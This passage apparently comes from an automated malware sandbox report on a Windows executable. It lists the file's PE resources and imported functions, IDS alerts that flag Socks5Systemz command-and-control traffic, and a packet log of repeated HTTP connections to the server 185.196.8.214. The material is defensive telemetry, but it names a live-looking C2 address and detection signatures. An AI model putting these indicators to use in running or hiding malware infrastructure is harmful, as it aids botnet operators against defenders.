                                                  RT_ICON0x17a0600x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5098547717842323
                                                  RT_ICON0x17c6080x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.5675422138836773
                                                  RT_ICON0x17d6b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6914893617021277
                                                  RT_ICON0x17db180x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.6322254335260116
                                                  RT_ICON0x17e0800x12786PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9997885108520369
                                                  RT_ICON0x1908080x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.48429551638471546
                                                  RT_ICON0x1a10300x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.5631437881017448
                                                  RT_ICON0x1aa4d80x67e8Device independent bitmap graphic, 80 x 160 x 32, image size 26560EnglishUnited States0.5571052631578948
                                                  RT_ICON0x1b0cc00x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.5760628465804066
                                                  RT_ICON0x1b61480x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.5798299480396788
                                                  RT_ICON0x1ba3700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.6322614107883817
                                                  RT_ICON0x1bc9180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.675187617260788
                                                  RT_ICON0x1bd9c00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.7340163934426229
                                                  RT_ICON0x1be3480x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.8093971631205674
                                                  RT_ICON0x200ab00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.2448405253283302
                                                  RT_ICON0x201b580x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.3962765957446808
                                                  RT_ICON0x201fc00x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336EnglishUnited States0.05638814095925674
                                                  RT_ICON0x1be7b00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 11811 x 11811 px/mEnglishUnited States0.11192946058091287
                                                  RT_ICON0x1c0d580x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 11811 x 11811 px/mEnglishUnited States0.1651031894934334
                                                  RT_ICON0x1c1e000x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 11811 x 11811 px/mEnglishUnited States0.230327868852459
                                                  RT_ICON0x1c27880x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 11811 x 11811 px/mEnglishUnited States0.3377659574468085
                                                  RT_ICON0x243fe80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.30491803278688523
                                                  RT_ICON0x1c2bf00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.32265342960288806
                                                  RT_ICON0x1c34980x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.11254467101114148
                                                  RT_ICON0x1cc9400x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.08856323198864309
                                                  RT_ICON0x1dd1680xca8Device independent bitmap graphic, 32 x 64 x 24, image size 3200EnglishUnited States0.11018518518518519
                                                  RT_ICON0x1dde100x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.12171669793621014
                                                  RT_ICON0x1deeb80x668Device independent bitmap graphic, 48 x 96 x 4, image size 1536EnglishUnited States0.12012195121951219
                                                  RT_ICON0x1df5200xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2688EnglishUnited States0.2126865671641791
                                                  RT_ICON0x1e03c80x1ca8Device independent bitmap graphic, 48 x 96 x 24, image size 7296EnglishUnited States0.07061068702290077
                                                  RT_ICON0x1e20700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.07738589211618258
                                                  RT_ICON0x1e46180xa68Device independent bitmap graphic, 64 x 128 x 4, image size 2560EnglishUnited States0.09121621621621621
                                                  RT_ICON0x1e50800x1628Device independent bitmap graphic, 64 x 128 x 8, image size 4608EnglishUnited States0.152327221438646
                                                  RT_ICON0x1e66a80x3228Device independent bitmap graphic, 64 x 128 x 24, image size 12800EnglishUnited States0.05163551401869159
                                                  RT_ICON0x1e98d00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 0EnglishUnited States0.052550779404818136
                                                  RT_ICON0x1edaf80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 0EnglishUnited States0.007896604755708032
                                                  RT_ICON0x2449700x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.14962210675484175
                                                  RT_ICON0x248b980x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.08995327102803738
                                                  RT_DIALOG0x1fe3200x17cdataEnglishUnited States0.6157894736842106
                                                  RT_GROUP_ICON0x1fe4a00x68dataEnglishUnited States0.75
                                                  RT_VERSION0x2593c00x2f4dataChineseChina0.43253968253968256
                                                  RT_MANIFEST0x2596b80x15aASCII text, with CRLF line terminatorsEnglishUnited States0.5491329479768786
                                                  DLLImport
                                                  WINMM.dllmmioStringToFOURCCW, mmioSendMessage, mmioSetBuffer, mmioWrite, mmioSeek, mmioStringToFOURCCA, mmioSetInfo
                                                  IMM32.dllImmGetContext
                                                  KERNEL32.dllFreeEnvironmentStringsW, FreeLibrary, GetACP, GetCommandLineW, GetConsoleCP, GetConsoleMode, GetConsoleOutputCP, GetCPInfo, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetEnvironmentVariableW, GetFileAttributesW, GetFileTime, GetFileType, GetLastError, GetLocaleInfoA, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleA, GetOEMCP, GetPrivateProfileIntW, GetPrivateProfileSectionNamesW, GetPrivateProfileStringW, GetProcAddress, GetProcessHeap, GetStartupInfoA, GetStdHandle, GetStringTypeA, GetStringTypeW, GetSystemTimeAsFileTime, GetTempPathW, GetThreadPriority, GetTimeZoneInformation, GetVersionExA, GetVersionExW, GlobalAlloc, GlobalFree, GlobalHandle, GlobalLock, GlobalUnlock, HeapAlloc, HeapCreate, HeapDestroy, HeapFree, HeapReAlloc, HeapSize, InterlockedDecrement, InterlockedIncrement, IsValidCodePage, GetCommandLineA, LCMapStringW, LoadLibraryW, LoadResource, FreeEnvironmentStringsA, LocalFree, LockResource, lstrlenA, MoveFileExW, MultiByteToWideChar, OpenProcess, QueryPerformanceCounter, QueryPerformanceFrequency, RaiseException, ReadFile, ReleaseMutex, RemoveDirectoryW, ResetEvent, SetEndOfFile, SetEnvironmentVariableA, SetEnvironmentVariableW, SetEvent, SetFileAttributesW, SetFilePointer, SetHandleCount, SetLastError, SetStdHandle, SetThreadPriority, SetUnhandledExceptionFilter, SizeofResource, Sleep, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, VirtualAlloc, VirtualFree, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WideCharToMultiByte, WriteConsoleA, WriteConsoleW, WriteFile, Process32FirstW, Process32NextW, GetEnvironmentStrings, GetCurrentProcess, ExitProcess, GetVersion, RtlUnwind, InitializeCriticalSection, EnterCriticalSection, GetTickCount, LeaveCriticalSection, LoadLibraryA, LocalAlloc, GetStartupInfoW, LCMapStringA, GetEnvironmentVariableA
                                                  USER32.dllGetWindowRect, GetWindowTextW, GetWindowThreadProcessId, InsertMenuItemW, InsertMenuW, InvalidateRect, IsDialogMessageW, IsDlgButtonChecked, IsIconic, IsWindow, IsWindowVisible, IsZoomed, KillTimer, LoadCursorW, LoadIconW, LoadImageW, MapDialogRect, MapVirtualKeyW, MessageBoxW, MoveWindow, MsgWaitForMultipleObjects, PeekMessageW, PostMessageW, PostQuitMessage, RegisterClassW, ReleaseDC, RemovePropW, ScreenToClient, ScrollWindowEx, SendDlgItemMessageW, SendMessageW, SetActiveWindow, SetCursor, SetDlgItemInt, SetDlgItemTextW, SetFocus, SetMenuDefaultItem, GetWindowPlacement, SetPropW, SetScrollInfo, SetTimer, SetWindowLongW, SetWindowPlacement, SetWindowPos, SetWindowsHookExW, SetWindowTextW, ShowWindow, TrackPopupMenu, TranslateMessage, UnhookWindowsHookEx, UpdateWindow, WaitForInputIdle, WindowFromDC, wsprintfW, MessageBoxA, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollInfo, GetPropW, GetParent, GetMessageW, GetMenu, GetKeyState, GetKeyNameTextW, GetForegroundWindow, GetFocus, GetDlgItemTextW, GetDlgItemInt, GetDlgItem, GetDlgCtrlID, GetDesktopWindow, GetDC, GetCursor, GetWindowLongW, SetMenuItemInfoW, GetClientRect, GetClassNameA, FrameRect, FindWindowW, FillRect, GetWindowDC
                                                  comdlg32.dllChooseColorA, CommDlgExtendedError
                                                  ADVAPI32.dllRegCloseKey, RegOpenKeyExA, OpenProcessToken, OpenThreadToken, RegCreateKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumKeyExW, RegEnumKeyW, RegOpenKeyExW, RegOpenKeyW, RegQueryValueExW, RegQueryValueW, RegSetValueExW, RegQueryValueExA
                                                  OLEAUT32.dllVariantInit
                                                  Language of compilation systemCountry where language is spokenMap
                                                  EnglishUnited States
                                                  ChineseChina
                                                  TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                                  2024-08-31T22:13:21.067707+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114972080192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:38.485156+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114973680192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:40.984852+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114973980192.168.2.9185.196.8.214
                                                  2024-08-31T22:14:12.426483+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114977080192.168.2.9185.196.8.214
                                                  2024-08-31T22:14:19.630560+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114977880192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:23.068462+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114972280192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:40.178639+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114973880192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:47.651547+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114974680192.168.2.9185.196.8.214
                                                  2024-08-31T22:14:18.819460+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114977780192.168.2.9185.196.8.214
                                                  2024-08-31T22:14:00.588783+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114975980192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:51.559222+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114974980192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:39.346060+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114973780192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:58.050877+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114975680192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:57.213414+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114975580192.168.2.9185.196.8.214
                                                  2024-08-31T22:14:01.396169+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114976080192.168.2.9185.196.8.214
                                                  2024-08-31T22:14:31.215466+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114979480192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:45.496154+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114974480192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:43.819808+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114974280192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:28.427710+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114972880192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:25.567897+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114972580192.168.2.9185.196.8.214
                                                  2024-08-31T22:14:28.734686+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114978980192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:34.049471+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114973380192.168.2.9185.196.8.214
                                                  2024-08-31T22:14:25.443187+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114978580192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:36.033652+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114973580192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:21.881623+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114972180192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:30.488247+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114973080192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:48.460032+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114974780192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:44.674814+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114974380192.168.2.9185.196.8.214
                                                  2024-08-31T22:14:11.611904+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114976980192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:54.739783+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114975280192.168.2.9185.196.8.214
                                                  2024-08-31T22:14:16.022052+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114977480192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:34.861365+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114973480192.168.2.9185.196.8.214
                                                  2024-08-31T22:14:14.399313+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114977280192.168.2.9185.196.8.214
                                                  2024-08-31T22:14:21.317861+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114978080192.168.2.9185.196.8.214
                                                  2024-08-31T22:14:15.206583+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114977380192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:24.727641+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114972480192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:27.579978+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114972780192.168.2.9185.196.8.214
                                                  2024-08-31T22:14:10.786477+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114976880192.168.2.9185.196.8.214
                                                  2024-08-31T22:14:29.555951+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114979080192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:58.929152+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114975780192.168.2.9185.196.8.214
                                                  2024-08-31T22:14:22.966280+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114978280192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:27.230646+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114972780192.168.2.9185.196.8.214
                                                  2024-08-31T22:14:30.374754+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114979180192.168.2.9185.196.8.214
                                                  2024-08-31T22:14:04.923998+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114976480192.168.2.9185.196.8.214
                                                  2024-08-31T22:14:08.667951+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114976680192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:31.303698+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114973180192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:42.991483+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114974180192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:29.245060+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114972980192.168.2.9185.196.8.214
                                                  2024-08-31T22:14:07.832793+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114976480192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:45.845487+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114974480192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:33.355540+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114973380192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:38.142044+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114973680192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:42.164915+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114974080192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:33.704540+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114973380192.168.2.9185.196.8.214
                                                  2024-08-31T22:14:18.002525+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114977680192.168.2.9185.196.8.214
                                                  2024-08-31T22:14:26.270947+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114978680192.168.2.9185.196.8.214
                                                  2024-08-31T22:14:14.047189+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114977280192.168.2.9185.196.8.214
                                                  2024-08-31T22:14:13.239729+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114977180192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:52.748597+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114975080192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:53.914207+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114975180192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:49.658488+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114974880192.168.2.9185.196.8.214
                                                  2024-08-31T22:14:27.915380+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114978880192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:46.818976+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114974580192.168.2.9185.196.8.214
                                                  2024-08-31T22:14:17.196962+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114977580192.168.2.9185.196.8.214
                                                  2024-08-31T22:14:16.841168+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114977580192.168.2.9185.196.8.214
                                                  2024-08-31T22:14:03.032767+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114976280192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:32.118123+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114973280192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:49.309231+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114974880192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:50.353090+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114974880192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:56.398645+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114975480192.168.2.9185.196.8.214
                                                  2024-08-31T22:14:09.020764+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114976680192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:23.880712+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114972380192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:50.001036+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114974880192.168.2.9185.196.8.214
                                                  2024-08-31T22:14:04.062935+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114976380192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:55.569903+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114975380192.168.2.9185.196.8.214
                                                  2024-08-31T22:14:23.792402+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114978380192.168.2.9185.196.8.214
                                                  2024-08-31T22:14:02.219305+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114976180192.168.2.9185.196.8.214
                                                  2024-08-31T22:14:22.129953+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114978180192.168.2.9185.196.8.214
                                                  2024-08-31T22:14:20.472670+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114977980192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:30.109888+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114973080192.168.2.9185.196.8.214
                                                  2024-08-31T22:14:10.434426+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114976880192.168.2.9185.196.8.214
                                                  2024-08-31T22:14:27.089047+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114978780192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:22.718526+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114972280192.168.2.9185.196.8.214
                                                  2024-08-31T22:14:10.079726+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114976880192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:51.204579+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114974980192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:32.995984+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114973380192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:59.758332+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114975880192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:51.915084+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114974980192.168.2.9185.196.8.214
                                                  2024-08-31T22:14:24.633476+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114978480192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:35.209076+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114973480192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:41.332836+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114973980192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:26.406034+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114972680192.168.2.9185.196.8.214
                                                  2024-08-31T22:13:53.098519+0200TCP2049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M114975080192.168.2.9185.196.8.214
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Aug 31, 2024 22:13:20.373533964 CEST4972080192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:13:20.378537893 CEST8049720185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:13:20.378730059 CEST4972080192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:13:20.378920078 CEST4972080192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:13:20.383800983 CEST8049720185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:13:21.067531109 CEST8049720185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:13:21.067707062 CEST4972080192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:13:21.186844110 CEST4972080192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:13:21.187233925 CEST4972180192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:13:21.192085981 CEST8049721185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:13:21.192101955 CEST8049720185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:13:21.192159891 CEST4972080192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:13:21.192168951 CEST4972180192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:13:21.192502975 CEST4972180192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:13:21.197259903 CEST8049721185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:13:21.881506920 CEST8049721185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:13:21.881623030 CEST4972180192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:13:21.998914003 CEST4972180192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:13:21.999265909 CEST4972280192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:13:22.004648924 CEST8049722185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:13:22.004740953 CEST4972280192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:13:22.004882097 CEST8049721185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:13:22.004890919 CEST4972280192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:13:22.004939079 CEST4972180192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:13:22.009756088 CEST8049722185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:13:22.718441010 CEST8049722185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:13:22.718525887 CEST4972280192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:13:22.827095032 CEST4972280192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:13:22.831984043 CEST8049722185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:13:23.068290949 CEST8049722185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:13:23.068461895 CEST4972280192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:13:23.186326981 CEST4972280192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:13:23.186665058 CEST4972380192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:13:23.191477060 CEST8049722185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:13:23.191530943 CEST8049723185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:13:23.191598892 CEST4972280192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:13:23.191651106 CEST4972380192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:13:23.191839933 CEST4972380192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:13:23.196573973 CEST8049723185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:13:23.880629063 CEST8049723185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:13:23.880712032 CEST4972380192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:13:24.007383108 CEST4972380192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:13:24.007707119 CEST4972480192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:13:24.012419939 CEST8049723185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:13:24.012506962 CEST4972380192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:13:24.012535095 CEST8049724185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:13:24.012603045 CEST4972480192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:13:24.012777090 CEST4972480192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:13:24.017545938 CEST8049724185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:13:24.727519989 CEST8049724185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:13:24.727641106 CEST4972480192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:13:24.842725992 CEST4972480192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:13:24.843071938 CEST4972580192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:13:24.847840071 CEST8049724185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:13:24.847922087 CEST4972480192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:13:24.847937107 CEST8049725185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:13:24.848010063 CEST4972580192.168.2.9185.196.8.214
